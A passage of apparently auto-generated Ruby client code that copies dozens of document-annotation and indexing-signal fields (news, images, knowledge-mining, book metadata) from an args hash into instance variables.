args.key?(:datacommons_datacommons_triples_signal)\n @date_annotation_tags = args[:date_annotation_tags] if args.key?(:date_annotation_tags)\n @date_annotations = args[:date_annotations] if args.key?(:date_annotations)\n @date_range_annotations = args[:date_range_annotations] if args.key?(:date_range_annotations)\n @date_time_annotations = args[:date_time_annotations] if args.key?(:date_time_annotations)\n @discover_source = args[:discover_source] if args.key?(:discover_source)\n @discussion = args[:discussion] if args.key?(:discussion)\n @document_intent = args[:document_intent] if args.key?(:document_intent)\n @dots_garamond_signal = args[:dots_garamond_signal] if args.key?(:dots_garamond_signal)\n @dots_newsstand_signal = args[:dots_newsstand_signal] if args.key?(:dots_newsstand_signal)\n @email_address_annotations = args[:email_address_annotations] if args.key?(:email_address_annotations)\n @extracted_book_info = args[:extracted_book_info] if args.key?(:extracted_book_info)\n @fatcat_compact_doc_classification = args[:fatcat_compact_doc_classification] if args.key?(:fatcat_compact_doc_classification)\n @fatcat_site_verticals_annotation = args[:fatcat_site_verticals_annotation] if args.key?(:fatcat_site_verticals_annotation)\n @firstseen = args[:firstseen] if args.key?(:firstseen)\n @fonts_analysis_annotator_fonts_annotation = args[:fonts_analysis_annotator_fonts_annotation] if args.key?(:fonts_analysis_annotator_fonts_annotation)\n @forum_ranking_forum_posts_safe_search_annotation = args[:forum_ranking_forum_posts_safe_search_annotation] if args.key?(:forum_ranking_forum_posts_safe_search_annotation)\n @foundation_splinter_signal = args[:foundation_splinter_signal] if args.key?(:foundation_splinter_signal)\n @freshbox_freshbox_article_annotation = args[:freshbox_freshbox_article_annotation] if args.key?(:freshbox_freshbox_article_annotation)\n @geo_point_annotations = args[:geo_point_annotations] if args.key?(:geo_point_annotations)\n @geo_point_resolution = args[:geo_point_resolution] if args.key?(:geo_point_resolution)\n @geostore_address_proto = args[:geostore_address_proto] if args.key?(:geostore_address_proto)\n @i2e_v2_image_entities_infos = args[:i2e_v2_image_entities_infos] if args.key?(:i2e_v2_image_entities_infos)\n @image_content_annotation_labels = args[:image_content_annotation_labels] if args.key?(:image_content_annotation_labels)\n @image_content_color_search_color_detection_results = args[:image_content_color_search_color_detection_results] if args.key?(:image_content_color_search_color_detection_results)\n @image_data_list = args[:image_data_list] if args.key?(:image_data_list)\n @image_extra_image_extra_terms = args[:image_extra_image_extra_terms] if args.key?(:image_extra_image_extra_terms)\n @image_monetization_featured_document_properties = args[:image_monetization_featured_document_properties] if args.key?(:image_monetization_featured_document_properties)\n @image_mustang_favicon_info = args[:image_mustang_favicon_info] if args.key?(:image_mustang_favicon_info)\n @image_mustang_websearch_image_snippet_response = args[:image_mustang_websearch_image_snippet_response] if args.key?(:image_mustang_websearch_image_snippet_response)\n @image_quality_labelmaker_doc_media_labels = args[:image_quality_labelmaker_doc_media_labels] if args.key?(:image_quality_labelmaker_doc_media_labels)\n @image_quality_landing_page_proto_landing_page_salient_text_set = args[:image_quality_landing_page_proto_landing_page_salient_text_set] if args.key?(:image_quality_landing_page_proto_landing_page_salient_text_set)\n @image_quality_layout_document = args[:image_quality_layout_document] if args.key?(:image_quality_layout_document)\n @image_quality_richdata_proto_image_anchor = args[:image_quality_richdata_proto_image_anchor] if args.key?(:image_quality_richdata_proto_image_anchor)\n @image_quality_richdata_proto_richdata = args[:image_quality_richdata_proto_richdata] if args.key?(:image_quality_richdata_proto_richdata)\n @image_quality_salient_terms_image_query_smearing_list = args[:image_quality_salient_terms_image_query_smearing_list] if args.key?(:image_quality_salient_terms_image_query_smearing_list)\n @image_quality_salient_terms_image_salient_term_set_map = args[:image_quality_salient_terms_image_salient_term_set_map] if args.key?(:image_quality_salient_terms_image_salient_term_set_map)\n @image_quality_sensitive_face_skin_tone_signals = args[:image_quality_sensitive_face_skin_tone_signals] if args.key?(:image_quality_sensitive_face_skin_tone_signals)\n @image_quality_sensitive_media_or_people_entities = args[:image_quality_sensitive_media_or_people_entities] if args.key?(:image_quality_sensitive_media_or_people_entities)\n @image_repository_geolocation = args[:image_repository_geolocation] if args.key?(:image_repository_geolocation)\n @image_repository_picasa_geo_data = args[:image_repository_picasa_geo_data] if args.key?(:image_repository_picasa_geo_data)\n @image_search_rejected_image_info_list = args[:image_search_rejected_image_info_list] if args.key?(:image_search_rejected_image_info_list)\n @image_stock_stock_image_annotation = args[:image_stock_stock_image_annotation] if args.key?(:image_stock_stock_image_annotation)\n @imageembed = args[:imageembed] if args.key?(:imageembed)\n @indexing_annotations_annotation_meta = args[:indexing_annotations_annotation_meta] if args.key?(:indexing_annotations_annotation_meta)\n @indexing_annotations_app_market_app_market_annotation = args[:indexing_annotations_app_market_app_market_annotation] if args.key?(:indexing_annotations_app_market_app_market_annotation)\n @indexing_annotations_apps_cache_colon_annotation = args[:indexing_annotations_apps_cache_colon_annotation] if args.key?(:indexing_annotations_apps_cache_colon_annotation)\n @indexing_annotations_apps_doc_restrictions_doc_preview_restrictions_annotation = args[:indexing_annotations_apps_doc_restrictions_doc_preview_restrictions_annotation] if args.key?(:indexing_annotations_apps_doc_restrictions_doc_preview_restrictions_annotation)\n @indexing_annotations_automobile_vin_annotator_automobile_vin_annotations = args[:indexing_annotations_automobile_vin_annotator_automobile_vin_annotations] if args.key?(:indexing_annotations_automobile_vin_annotator_automobile_vin_annotations)\n @indexing_annotations_canonical_url = args[:indexing_annotations_canonical_url] if args.key?(:indexing_annotations_canonical_url)\n @indexing_annotations_clean_text_proto = args[:indexing_annotations_clean_text_proto] if args.key?(:indexing_annotations_clean_text_proto)\n @indexing_annotations_collections_doc_collections = args[:indexing_annotations_collections_doc_collections] if args.key?(:indexing_annotations_collections_doc_collections)\n @indexing_annotations_comment_block_groups = args[:indexing_annotations_comment_block_groups] if args.key?(:indexing_annotations_comment_block_groups)\n @indexing_annotations_dataset_model_annotation = args[:indexing_annotations_dataset_model_annotation] if args.key?(:indexing_annotations_dataset_model_annotation)\n @indexing_annotations_dates_date_times = args[:indexing_annotations_dates_date_times] if args.key?(:indexing_annotations_dates_date_times)\n @indexing_annotations_doc_importance = args[:indexing_annotations_doc_importance] if args.key?(:indexing_annotations_doc_importance)\n @indexing_annotations_doc_restrictions_in_doc_restrictions_annotation = args[:indexing_annotations_doc_restrictions_in_doc_restrictions_annotation] if args.key?(:indexing_annotations_doc_restrictions_in_doc_restrictions_annotation)\n @indexing_annotations_entity_page = args[:indexing_annotations_entity_page] if args.key?(:indexing_annotations_entity_page)\n @indexing_annotations_feedback_set = args[:indexing_annotations_feedback_set] if args.key?(:indexing_annotations_feedback_set)\n @indexing_annotations_i_bert_embedding_annotation = args[:indexing_annotations_i_bert_embedding_annotation] if args.key?(:indexing_annotations_i_bert_embedding_annotation)\n @indexing_annotations_image_repository_image_license_info_annotation = args[:indexing_annotations_image_repository_image_license_info_annotation] if args.key?(:indexing_annotations_image_repository_image_license_info_annotation)\n @indexing_annotations_pcu_amp_error = args[:indexing_annotations_pcu_amp_error] if args.key?(:indexing_annotations_pcu_amp_error)\n @indexing_annotations_pcu_signed_exchange_info = args[:indexing_annotations_pcu_signed_exchange_info] if args.key?(:indexing_annotations_pcu_signed_exchange_info)\n @indexing_annotations_person_person_annotation = args[:indexing_annotations_person_person_annotation] if args.key?(:indexing_annotations_person_person_annotation)\n @indexing_annotations_sdu_page_type_annotation = args[:indexing_annotations_sdu_page_type_annotation] if args.key?(:indexing_annotations_sdu_page_type_annotation)\n @indexing_annotations_social_links_social_links_annotation = args[:indexing_annotations_social_links_social_links_annotation] if args.key?(:indexing_annotations_social_links_social_links_annotation)\n @indexing_annotations_subscribewithgoogle_swg_annotation = args[:indexing_annotations_subscribewithgoogle_swg_annotation] if args.key?(:indexing_annotations_subscribewithgoogle_swg_annotation)\n @indexing_annotations_twitter_embedded_tweets_annotation = args[:indexing_annotations_twitter_embedded_tweets_annotation] if args.key?(:indexing_annotations_twitter_embedded_tweets_annotation)\n @indexing_annotations_typed_number_typed_number_annotations = args[:indexing_annotations_typed_number_typed_number_annotations] if args.key?(:indexing_annotations_typed_number_typed_number_annotations)\n @indexing_annotations_wa_passages_query_to_passage_annotations = args[:indexing_annotations_wa_passages_query_to_passage_annotations] if args.key?(:indexing_annotations_wa_passages_query_to_passage_annotations)\n @indexing_annotations_wa_passages_trimmed_query_to_passage_annotations = args[:indexing_annotations_wa_passages_trimmed_query_to_passage_annotations] if args.key?(:indexing_annotations_wa_passages_trimmed_query_to_passage_annotations)\n @indexing_apps_affiliated_instant_app_info = args[:indexing_apps_affiliated_instant_app_info] if args.key?(:indexing_apps_affiliated_instant_app_info)\n @indexing_apps_merged_app_info_annotation = args[:indexing_apps_merged_app_info_annotation] if args.key?(:indexing_apps_merged_app_info_annotation)\n @indexing_badpages_bad_page_parse_result = args[:indexing_badpages_bad_page_parse_result] if args.key?(:indexing_badpages_bad_page_parse_result)\n @indexing_badpages_collapser_info = args[:indexing_badpages_collapser_info] if args.key?(:indexing_badpages_collapser_info)\n @indexing_badpages_index_selection_removal = args[:indexing_badpages_index_selection_removal] if args.key?(:indexing_badpages_index_selection_removal)\n @indexing_badpages_login_page_result = args[:indexing_badpages_login_page_result] if args.key?(:indexing_badpages_login_page_result)\n @indexing_badpages_unified_model_features = args[:indexing_badpages_unified_model_features] if args.key?(:indexing_badpages_unified_model_features)\n @indexing_bering_publisher_on_page_ads_annotation = args[:indexing_bering_publisher_on_page_ads_annotation] if args.key?(:indexing_bering_publisher_on_page_ads_annotation)\n @indexing_centerpiece_center_piece_annotations = args[:indexing_centerpiece_center_piece_annotations] if args.key?(:indexing_centerpiece_center_piece_annotations)\n @indexing_centerpiece_centerpiece_checksums = args[:indexing_centerpiece_centerpiece_checksums] if args.key?(:indexing_centerpiece_centerpiece_checksums)\n @indexing_centerpiece_component_learning_source = args[:indexing_centerpiece_component_learning_source] if args.key?(:indexing_centerpiece_component_learning_source)\n @indexing_centerpiece_section_title_annotations = args[:indexing_centerpiece_section_title_annotations] if args.key?(:indexing_centerpiece_section_title_annotations)\n @indexing_converter_content_generation_info = args[:indexing_converter_content_generation_info] if args.key?(:indexing_converter_content_generation_info)\n @indexing_converter_content_parser_results = args[:indexing_converter_content_parser_results] if args.key?(:indexing_converter_content_parser_results)\n @indexing_converter_file_meta_info = args[:indexing_converter_file_meta_info] if args.key?(:indexing_converter_file_meta_info)\n @indexing_converter_link_rel_outlinks = args[:indexing_converter_link_rel_outlinks] if args.key?(:indexing_converter_link_rel_outlinks)\n @indexing_converter_meta_detectors_results_proto = args[:indexing_converter_meta_detectors_results_proto] if args.key?(:indexing_converter_meta_detectors_results_proto)\n @indexing_converter_pdf_file_meta_info = args[:indexing_converter_pdf_file_meta_info] if args.key?(:indexing_converter_pdf_file_meta_info)\n @indexing_converter_pdf_page_annotations = args[:indexing_converter_pdf_page_annotations] if args.key?(:indexing_converter_pdf_page_annotations)\n @indexing_custom_corpus_cdm_annotations = args[:indexing_custom_corpus_cdm_annotations] if args.key?(:indexing_custom_corpus_cdm_annotations)\n @indexing_deepweb_store_list_annotation = args[:indexing_deepweb_store_list_annotation] if args.key?(:indexing_deepweb_store_list_annotation)\n @indexing_docjoiner_serving_time_cluster_ids = args[:indexing_docjoiner_serving_time_cluster_ids] if args.key?(:indexing_docjoiner_serving_time_cluster_ids)\n @indexing_docjoiner_wiki_info = args[:indexing_docjoiner_wiki_info] if args.key?(:indexing_docjoiner_wiki_info)\n @indexing_docskeleton_repeated_pattern_repeated_pattern_annotation = args[:indexing_docskeleton_repeated_pattern_repeated_pattern_annotation] if args.key?(:indexing_docskeleton_repeated_pattern_repeated_pattern_annotation)\n @indexing_dups_localized_localized_cluster = args[:indexing_dups_localized_localized_cluster] if args.key?(:indexing_dups_localized_localized_cluster)\n @indexing_fresh_scheduler_fresh_scheduler_double_instant_extension = args[:indexing_fresh_scheduler_fresh_scheduler_double_instant_extension] if args.key?(:indexing_fresh_scheduler_fresh_scheduler_double_instant_extension)\n @indexing_fresh_scheduler_outlink_discovery_historical_hubs_signal = args[:indexing_fresh_scheduler_outlink_discovery_historical_hubs_signal] if args.key?(:indexing_fresh_scheduler_outlink_discovery_historical_hubs_signal)\n @indexing_images_related_image_signal = args[:indexing_images_related_image_signal] if args.key?(:indexing_images_related_image_signal)\n @indexing_instant_active_cluster_scorer_signal = args[:indexing_instant_active_cluster_scorer_signal] if args.key?(:indexing_instant_active_cluster_scorer_signal)\n @indexing_instant_base_reindex_whitelist_data = args[:indexing_instant_base_reindex_whitelist_data] if args.key?(:indexing_instant_base_reindex_whitelist_data)\n @indexing_instant_cluster_scorer_article = args[:indexing_instant_cluster_scorer_article] if args.key?(:indexing_instant_cluster_scorer_article)\n @indexing_instant_cluster_scorer_signal = args[:indexing_instant_cluster_scorer_signal] if args.key?(:indexing_instant_cluster_scorer_signal)\n @indexing_instant_historical_content_signals = args[:indexing_instant_historical_content_signals] if args.key?(:indexing_instant_historical_content_signals)\n @indexing_instant_news_highly_cited_document_signal = args[:indexing_instant_news_highly_cited_document_signal] if args.key?(:indexing_instant_news_highly_cited_document_signal)\n @indexing_instant_news_images_info = args[:indexing_instant_news_images_info] if args.key?(:indexing_instant_news_images_info)\n @indexing_instant_signal_source_tags_extension = args[:indexing_instant_signal_source_tags_extension] if args.key?(:indexing_instant_signal_source_tags_extension)\n @indexing_lattice_lattice_annotations = args[:indexing_lattice_lattice_annotations] if args.key?(:indexing_lattice_lattice_annotations)\n @indexing_metrics_url_indexing_props = args[:indexing_metrics_url_indexing_props] if args.key?(:indexing_metrics_url_indexing_props)\n @indexing_ml_dom_node_segments = args[:indexing_ml_dom_node_segments] if args.key?(:indexing_ml_dom_node_segments)\n @indexing_ml_entity_infoboxes = args[:indexing_ml_entity_infoboxes] if args.key?(:indexing_ml_entity_infoboxes)\n @indexing_ml_page_structure = args[:indexing_ml_page_structure] if args.key?(:indexing_ml_page_structure)\n @indexing_ml_semantic_article = args[:indexing_ml_semantic_article] if args.key?(:indexing_ml_semantic_article)\n @indexing_ml_shopping_universe_annotation = args[:indexing_ml_shopping_universe_annotation] if args.key?(:indexing_ml_shopping_universe_annotation)\n @indexing_ml_vertical_vertical_classification_result = args[:indexing_ml_vertical_vertical_classification_result] if args.key?(:indexing_ml_vertical_vertical_classification_result)\n @indexing_ml_vertical_vertical_classification_v2 = args[:indexing_ml_vertical_vertical_classification_v2] if args.key?(:indexing_ml_vertical_vertical_classification_v2)\n @indexing_mobile_client_dependent_info = args[:indexing_mobile_client_dependent_info] if args.key?(:indexing_mobile_client_dependent_info)\n @indexing_mobile_interstitials_proto_desktop_interstitials = args[:indexing_mobile_interstitials_proto_desktop_interstitials] if args.key?(:indexing_mobile_interstitials_proto_desktop_interstitials)\n @indexing_mobile_obelix_info = args[:indexing_mobile_obelix_info] if args.key?(:indexing_mobile_obelix_info)\n @indexing_mobile_smartphone_content_annotations = args[:indexing_mobile_smartphone_content_annotations] if args.key?(:indexing_mobile_smartphone_content_annotations)\n @indexing_mobile_smartphone_pattern_classification = args[:indexing_mobile_smartphone_pattern_classification] if args.key?(:indexing_mobile_smartphone_pattern_classification)\n @indexing_mobile_speed_page_speed_field_data = args[:indexing_mobile_speed_page_speed_field_data] if args.key?(:indexing_mobile_speed_page_speed_field_data)\n @indexing_plusone_plus_one_signal = args[:indexing_plusone_plus_one_signal] if args.key?(:indexing_plusone_plus_one_signal)\n @indexing_plusone_social_score_signal = args[:indexing_plusone_social_score_signal] if args.key?(:indexing_plusone_social_score_signal)\n @indexing_raffia_data_recovery_info = args[:indexing_raffia_data_recovery_info] if args.key?(:indexing_raffia_data_recovery_info)\n @indexing_raffia_indexing_intermediate = args[:indexing_raffia_indexing_intermediate] if args.key?(:indexing_raffia_indexing_intermediate)\n @indexing_raffia_media_processing_metadata = args[:indexing_raffia_media_processing_metadata] if args.key?(:indexing_raffia_media_processing_metadata)\n @indexing_raffia_overlay_c_doc_attachment = args[:indexing_raffia_overlay_c_doc_attachment] if args.key?(:indexing_raffia_overlay_c_doc_attachment)\n @indexing_selection_acquisition_metadata_attachment = args[:indexing_selection_acquisition_metadata_attachment] if args.key?(:indexing_selection_acquisition_metadata_attachment)\n @indexing_selection_double_indexing_extension = args[:indexing_selection_double_indexing_extension] if args.key?(:indexing_selection_double_indexing_extension)\n @indexing_selection_fast_serving_push = args[:indexing_selection_fast_serving_push] if args.key?(:indexing_selection_fast_serving_push)\n @indexing_selection_freshdocs_passthrough_extension = args[:indexing_selection_freshdocs_passthrough_extension] if args.key?(:indexing_selection_freshdocs_passthrough_extension)\n @indexing_selection_image_image_selection_attachment = args[:indexing_selection_image_image_selection_attachment] if args.key?(:indexing_selection_image_image_selection_attachment)\n @indexing_selection_language_extension = args[:indexing_selection_language_extension] if args.key?(:indexing_selection_language_extension)\n @indexing_selection_prior_scorer_parameter_set = args[:indexing_selection_prior_scorer_parameter_set] if args.key?(:indexing_selection_prior_scorer_parameter_set)\n @indexing_selection_processing_priority_extension = args[:indexing_selection_processing_priority_extension] if args.key?(:indexing_selection_processing_priority_extension)\n @indexing_selection_proto_base_promotion_info = args[:indexing_selection_proto_base_promotion_info] if args.key?(:indexing_selection_proto_base_promotion_info)\n @indexing_selection_tensor_flow_extension = args[:indexing_selection_tensor_flow_extension] if args.key?(:indexing_selection_tensor_flow_extension)\n @indexing_signal_aggregator_url_pattern_signals = args[:indexing_signal_aggregator_url_pattern_signals] if args.key?(:indexing_signal_aggregator_url_pattern_signals)\n @indexing_signals_accumulated_online_signals = args[:indexing_signals_accumulated_online_signals] if args.key?(:indexing_signals_accumulated_online_signals)\n @indexing_signals_impressions_per_day_container = args[:indexing_signals_impressions_per_day_container] if args.key?(:indexing_signals_impressions_per_day_container)\n @indexing_social_counts_social_widgets_indicator = args[:indexing_social_counts_social_widgets_indicator] if args.key?(:indexing_social_counts_social_widgets_indicator)\n @indexing_speech_goldmine_podcast_annotation = args[:indexing_speech_goldmine_podcast_annotation] if args.key?(:indexing_speech_goldmine_podcast_annotation)\n @indexing_speech_speech_page_properties_proto = args[:indexing_speech_speech_page_properties_proto] if args.key?(:indexing_speech_speech_page_properties_proto)\n @indexing_thirdparty_third_party_inputs = args[:indexing_thirdparty_third_party_inputs] if args.key?(:indexing_thirdparty_third_party_inputs)\n @indexing_ugc_page_param_info = args[:indexing_ugc_page_param_info] if args.key?(:indexing_ugc_page_param_info)\n @indexing_union_key_data = args[:indexing_union_key_data] if args.key?(:indexing_union_key_data)\n @indexing_url_pattern_url_tree_url_pattern_annotations = args[:indexing_url_pattern_url_tree_url_pattern_annotations] if args.key?(:indexing_url_pattern_url_tree_url_pattern_annotations)\n @indexing_videos_video_anchor_source_info = args[:indexing_videos_video_anchor_source_info] if args.key?(:indexing_videos_video_anchor_source_info)\n @indexing_videos_video_playlist_anchor_signal = args[:indexing_videos_video_playlist_anchor_signal] if args.key?(:indexing_videos_video_playlist_anchor_signal)\n @indexing_web_channels_web_channel_annotations = args[:indexing_web_channels_web_channel_annotations] if args.key?(:indexing_web_channels_web_channel_annotations)\n @infoextraction_pinpoint_pinpoint_annotation_signal = args[:infoextraction_pinpoint_pinpoint_annotation_signal] if args.key?(:infoextraction_pinpoint_pinpoint_annotation_signal)\n @infoextraction_pinpoint_pinpoint_signal = args[:infoextraction_pinpoint_pinpoint_signal] if args.key?(:infoextraction_pinpoint_pinpoint_signal)\n @instant_chrome_views = args[:instant_chrome_views] if args.key?(:instant_chrome_views)\n @instant_navboost = args[:instant_navboost] if args.key?(:instant_navboost)\n @knowledge_graph_acquisition_feeds_quotes_quotes_annotation = args[:knowledge_graph_acquisition_feeds_quotes_quotes_annotation] if args.key?(:knowledge_graph_acquisition_feeds_quotes_quotes_annotation)\n @knowledge_mining_facts_document_signals = args[:knowledge_mining_facts_document_signals] if args.key?(:knowledge_mining_facts_document_signals)\n @knowledge_mining_facts_fact_evaluation_signals = args[:knowledge_mining_facts_fact_evaluation_signals] if args.key?(:knowledge_mining_facts_fact_evaluation_signals)\n @knowledge_mining_facts_html_table_signal = args[:knowledge_mining_facts_html_table_signal] if args.key?(:knowledge_mining_facts_html_table_signal)\n @knowledge_mining_facts_kats_signals = args[:knowledge_mining_facts_kats_signals] if args.key?(:knowledge_mining_facts_kats_signals)\n @knowledge_mining_facts_localized_fact = args[:knowledge_mining_facts_localized_fact] if args.key?(:knowledge_mining_facts_localized_fact)\n @knowledge_mining_facts_object_annotations_signal = args[:knowledge_mining_facts_object_annotations_signal] if args.key?(:knowledge_mining_facts_object_annotations_signal)\n @knowledge_mining_facts_product_composition_signal = args[:knowledge_mining_facts_product_composition_signal] if args.key?(:knowledge_mining_facts_product_composition_signal)\n @knowledge_mining_facts_serving_data = args[:knowledge_mining_facts_serving_data] if args.key?(:knowledge_mining_facts_serving_data)\n @knowledge_mining_facts_shopping_signals = args[:knowledge_mining_facts_shopping_signals] if args.key?(:knowledge_mining_facts_shopping_signals)\n @knowledge_mining_facts_structured_snippets_signal = args[:knowledge_mining_facts_structured_snippets_signal] if args.key?(:knowledge_mining_facts_structured_snippets_signal)\n @knowledge_mining_facts_udr_extra_fact_data = args[:knowledge_mining_facts_udr_extra_fact_data] if args.key?(:knowledge_mining_facts_udr_extra_fact_data)\n @knowledge_mining_facts_udr_extra_fact_mention_data = args[:knowledge_mining_facts_udr_extra_fact_mention_data] if args.key?(:knowledge_mining_facts_udr_extra_fact_mention_data)\n @knowledge_mining_facts_universal_fact_metadata = args[:knowledge_mining_facts_universal_fact_metadata] if args.key?(:knowledge_mining_facts_universal_fact_metadata)\n @knowledge_mining_facts_universal_fact_scores = args[:knowledge_mining_facts_universal_fact_scores] if args.key?(:knowledge_mining_facts_universal_fact_scores)\n @knowledge_mining_facts_universal_table_signal = args[:knowledge_mining_facts_universal_table_signal] if args.key?(:knowledge_mining_facts_universal_table_signal)\n @knowledge_mining_facts_web_kv_site_group_signal = args[:knowledge_mining_facts_web_kv_site_group_signal] if args.key?(:knowledge_mining_facts_web_kv_site_group_signal)\n @knowledge_mining_shopping_browseonomy_data = args[:knowledge_mining_shopping_browseonomy_data] if args.key?(:knowledge_mining_shopping_browseonomy_data)\n @knowledge_mining_shopping_twd_model_versions = args[:knowledge_mining_shopping_twd_model_versions] if args.key?(:knowledge_mining_shopping_twd_model_versions)\n @knowledge_mum_story_teaser_annotation = args[:knowledge_mum_story_teaser_annotation] if args.key?(:knowledge_mum_story_teaser_annotation)\n @knowledge_mum_storytime_stamp_engagement_annotation = args[:knowledge_mum_storytime_stamp_engagement_annotation] if args.key?(:knowledge_mum_storytime_stamp_engagement_annotation)\n @knowledge_mum_storytime_stamp_quality_annotation = args[:knowledge_mum_storytime_stamp_quality_annotation] if args.key?(:knowledge_mum_storytime_stamp_quality_annotation)\n @knowledge_tables_table_internal_data = args[:knowledge_tables_table_internal_data] if args.key?(:knowledge_tables_table_internal_data)\n @knowledge_tables_universal_table_annotations = args[:knowledge_tables_universal_table_annotations] if args.key?(:knowledge_tables_universal_table_annotations)\n @knowledge_tasks_universal_task_annotation = args[:knowledge_tasks_universal_task_annotation] if args.key?(:knowledge_tasks_universal_task_annotation)\n @knowledge_tpf_howtodo_howto_video_annotation = args[:knowledge_tpf_howtodo_howto_video_annotation] if args.key?(:knowledge_tpf_howtodo_howto_video_annotation)\n @lang_id_lang_reasoner_document_languages = args[:lang_id_lang_reasoner_document_languages] if args.key?(:lang_id_lang_reasoner_document_languages)\n @lens_vsai_datasets = args[:lens_vsai_datasets] if args.key?(:lens_vsai_datasets)\n @localsearch_authority_site_annotation = args[:localsearch_authority_site_annotation] if args.key?(:localsearch_authority_site_annotation)\n @localyp = args[:localyp] if args.key?(:localyp)\n @maps_synthetics_geo_doc_fetch_key = args[:maps_synthetics_geo_doc_fetch_key] if args.key?(:maps_synthetics_geo_doc_fetch_key)\n @measurement_annotations = args[:measurement_annotations] if args.key?(:measurement_annotations)\n @metaweb_extraction_document_evidence = args[:metaweb_extraction_document_evidence] if args.key?(:metaweb_extraction_document_evidence)\n @modern_format_content = args[:modern_format_content] if args.key?(:modern_format_content)\n @nav_boost_document = args[:nav_boost_document] if args.key?(:nav_boost_document)\n @navboost = args[:navboost] if args.key?(:navboost)\n @news_annotations_content_annotations = args[:news_annotations_content_annotations] if args.key?(:news_annotations_content_annotations)\n @news_corpus_hub_page_annotations = args[:news_corpus_hub_page_annotations] if args.key?(:news_corpus_hub_page_annotations)\n @news_corpus_leaf_page_annotation = args[:news_corpus_leaf_page_annotation] if args.key?(:news_corpus_leaf_page_annotation)\n @news_corpus_news_aggregate_signal = args[:news_corpus_news_aggregate_signal] if args.key?(:news_corpus_news_aggregate_signal)\n @news_corpus_news_corpus_annotation = args[:news_corpus_news_corpus_annotation] if args.key?(:news_corpus_news_corpus_annotation)\n @news_corpus_news_corpus_root_annotation = args[:news_corpus_news_corpus_root_annotation] if args.key?(:news_corpus_news_corpus_root_annotation)\n @news_corpus_news_corpus_status_annotation = args[:news_corpus_news_corpus_status_annotation] if args.key?(:news_corpus_news_corpus_status_annotation)\n @news_corpus_newsiness_annotation = args[:news_corpus_newsiness_annotation] if args.key?(:news_corpus_newsiness_annotation)\n @news_corpus_position_rank_annotations = args[:news_corpus_position_rank_annotations] if args.key?(:news_corpus_position_rank_annotations)\n @news_crawl_filter_news_link_crawl_signal = args[:news_crawl_filter_news_link_crawl_signal] if args.key?(:news_crawl_filter_news_link_crawl_signal)\n @news_extraction_news_pbe_annotations = args[:news_extraction_news_pbe_annotations] if args.key?(:news_extraction_news_pbe_annotations)\n @news_nar_indexing_metadata = args[:news_nar_indexing_metadata] if args.key?(:news_nar_indexing_metadata)\n @news_nar_row = args[:news_nar_row] if args.key?(:news_nar_row)\n @news_nar_row_container = args[:news_nar_row_container] if args.key?(:news_nar_row_container)\n @news_near_dups_info = args[:news_near_dups_info] if args.key?(:news_near_dups_info)\n @news_newroman_indexing_new_roman_signal = args[:news_newroman_indexing_new_roman_signal] if args.key?(:news_newroman_indexing_new_roman_signal)\n @news_news_article_checksum = args[:news_news_article_checksum] if args.key?(:news_news_article_checksum)\n @news_news_classifications = args[:news_news_classifications] if args.key?(:news_news_classifications)\n @news_news_content_signals = args[:news_news_content_signals] if args.key?(:news_news_content_signals)\n @news_news_for_education_reading_statistics = args[:news_news_for_education_reading_statistics] if args.key?(:news_news_for_education_reading_statistics)\n @news_videos_news_anchor_source_info = args[:news_videos_news_anchor_source_info] if args.key?(:news_videos_news_anchor_source_info)\n @news_videos_news_video_annotation_signals = args[:news_videos_news_video_annotation_signals] if args.key?(:news_videos_news_video_annotation_signals)\n @nlp_atc_clara_annotation = args[:nlp_atc_clara_annotation] if args.key?(:nlp_atc_clara_annotation)\n @nlp_saft_document = args[:nlp_saft_document] if args.key?(:nlp_saft_document)\n @nlp_saft_nlx_doc_annotator_migration = args[:nlp_saft_nlx_doc_annotator_migration] if args.key?(:nlp_saft_nlx_doc_annotator_migration)\n @nlp_saft_rodin_classification = args[:nlp_saft_rodin_classification] if args.key?(:nlp_saft_rodin_classification)\n @nlp_sentiment_sentiment_annotation = args[:nlp_sentiment_sentiment_annotation] if args.key?(:nlp_sentiment_sentiment_annotation)\n @nlx_doc_annotation = args[:nlx_doc_annotation] if args.key?(:nlx_doc_annotation)\n @noindexed_image_data_list = args[:noindexed_image_data_list] if args.key?(:noindexed_image_data_list)\n @number_annotations = args[:number_annotations] if args.key?(:number_annotations)\n @ocean_librarian_book_metadata = args[:ocean_librarian_book_metadata] if args.key?(:ocean_librarian_book_metadata)\n @ocean_librarian_populator_data = args[:ocean_librarian_populator_data] if args.key?(:ocean_librarian_populator_data)\n @ocean_librarian_populator_page_data = args[:ocean_librarian_populator_page_data] if args.key?(:ocean_librarian_populator_page_data)\n @ocean_metadata_all_item_specific_bibdatas = args[:ocean_metadata_all_item_specific_bibdatas] if args.key?(:ocean_metadata_all_item_specific_bibdatas)\n @ocean_metadata_availability_info_component = args[:ocean_metadata_availability_info_component] if args.key?(:ocean_metadata_availability_info_component)\n @ocean_metadata_availability_snapshot = args[:ocean_metadata_availability_snapshot] if args.key?(:ocean_metadata_availability_snapshot)\n @ocean_metadata_availability_snapshot_holder = args[:ocean_metadata_availability_snapshot_holder] if args.key?(:ocean_metadata_availability_snapshot_holder)\n @ocean_metadata_bibkey_component = args[:ocean_metadata_bibkey_component] if args.key?(:ocean_metadata_bibkey_component)\n @ocean_metadata_cluster_horizontal_reference = args[:ocean_metadata_cluster_horizontal_reference] if args.key?(:ocean_metadata_cluster_horizontal_reference)\n @ocean_metadata_cluster_record = args[:ocean_metadata_cluster_record] if args.key?(:ocean_metadata_cluster_record)\n @ocean_metadata_cluster_volumes = args[:ocean_metadata_cluster_volumes] if args.key?(:ocean_metadata_cluster_volumes)\n @ocean_metadata_clustering_series_series_info = args[:ocean_metadata_clustering_series_series_info] if args.key?(:ocean_metadata_clustering_series_series_info)\n @ocean_metadata_clustering_tome_horizontal_link_descriptor = args[:ocean_metadata_clustering_tome_horizontal_link_descriptor] if args.key?(:ocean_metadata_clustering_tome_horizontal_link_descriptor)\n @ocean_metadata_contributor_links = args[:ocean_metadata_contributor_links] if args.key?(:ocean_metadata_contributor_links)\n @ocean_metadata_item_specific_bibdata_component = args[:ocean_metadata_item_specific_bibdata_component] if args.key?(:ocean_metadata_item_specific_bibdata_component)\n @ocean_metadata_kg_topic_links = args[:ocean_metadata_kg_topic_links] if args.key?(:ocean_metadata_kg_topic_links)\n @ocean_metadata_language_info_component = args[:ocean_metadata_language_info_component] if args.key?(:ocean_metadata_language_info_component)\n @ocean_metadata_material_info_component = args[:ocean_metadata_material_info_component] if args.key?(:ocean_metadata_material_info_component)\n @ocean_metadata_parsed_access_terms = args[:ocean_metadata_parsed_access_terms] if args.key?(:ocean_metadata_parsed_access_terms)\n @ocean_metadata_parsed_su_doc = 